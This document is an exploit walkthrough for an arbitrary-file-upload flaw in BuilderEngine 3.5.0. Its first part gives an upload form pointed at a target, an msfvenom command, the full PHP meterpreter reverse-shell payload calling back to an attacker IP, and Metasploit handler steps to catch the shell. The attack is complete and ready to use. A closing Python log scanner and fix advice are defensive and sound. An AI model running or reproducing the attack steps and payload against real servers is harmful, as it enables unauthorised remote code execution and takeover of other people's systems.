BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0

#BuilderEngine 3.5.0 - Arbitrary File Upload

searchsploit -m php/webapps/40390.php

<html>
<body>
<form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
        <input type="file" name="files[]" />
        <input type="submit" value="send" />
</form>
</body>
</html>


#Change the form's action URL above to the target URI


<html>
<body>
<form method="post" action="http://192.168.101.190/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
        <input type="file" name="files[]" />
        <input type="submit" value="send" />
</form>
</body>
</html>

[1] Save the file as test.html

[2] Create a payload with msfvenom (a simple php-reverse-shell also works)

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.12.128 lport=4444 -f raw

#output:

<?php /**/ error_reporting(0); $ip = '192.168.12.128'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

[3] Copy the payload output and paste it into a file named shell.php

[4] Start a meterpreter listener to catch the shell

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.12.128
set lport 4444
run

[5] Right-click test.html and open it with Firefox

[6] Select the "shell.php" file created previously and submit the form

[7] The uploaded file is now available at http://192.168.101.190/files/; click the newly uploaded payload to trigger the reverse shell
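As an added defender-side example (not part of the original exploit), the following Python script scans web-server access logs for the request pattern this walkthrough produces: an unauthenticated POST to the bundled jquery-file-upload endpoint followed by a GET of a PHP file under /files/. The log lines, IP addresses and timestamps are constructed samples.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (Apache combined format) modelled on the
# request sequence in the walkthrough above; not a real capture.
SAMPLE_LOG = """\
192.168.12.128 - - [10/Mar/2017:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.12.128 - - [10/Mar/2017:10:00:09 +0000] "POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/ HTTP/1.1" 200 312 "-" "Mozilla/5.0"
192.168.12.128 - - [10/Mar/2017:10:00:25 +0000] "GET /files/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Mar/2017:10:01:00 +0000] "GET /files/logo.png HTTP/1.1" 200 8841 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# The unauthenticated upload handler shipped with BuilderEngine 3.5.0.
UPLOAD_ENDPOINT = "/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"
# Extensions a typical PHP web server would execute if they land in /files/.
EXEC_EXT = re.compile(r'\.(php\d?|phtml|phar)(\?.*)?$', re.IGNORECASE)

def parse(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_upload_abuse(log_text):
    """Return one finding per client IP that POSTed to the upload endpoint,
    plus one per IP that fetched a script from /files/ without uploading it."""
    uploads = defaultdict(list)     # ip -> timestamps of upload POSTs
    executions = defaultdict(list)  # ip -> executable paths fetched from /files/
    for line in log_text.splitlines():
        rec = parse(line)
        if not rec:
            continue
        if rec["method"] == "POST" and rec["path"].startswith(UPLOAD_ENDPOINT):
            uploads[rec["ip"]].append(rec["ts"])
        elif rec["path"].startswith("/files/") and EXEC_EXT.search(rec["path"]):
            executions[rec["ip"]].append(rec["path"])
    findings = []
    for ip, stamps in uploads.items():
        hits = sorted(set(executions.get(ip, [])))
        findings.append({"ip": ip, "uploads": len(stamps), "executed": hits,
                         "severity": "critical" if hits else "high"})
    for ip, paths in executions.items():
        if ip not in uploads:  # script fetched by a client that did not upload it
            findings.append({"ip": ip, "uploads": 0, "executed": sorted(set(paths)),
                             "severity": "high"})
    return findings

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(finding)
```

Any POST to this endpoint from an unauthenticated client is itself a finding; the fix is to remove or authenticate the bundled demo upload handler and to deny script execution in the upload directory.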
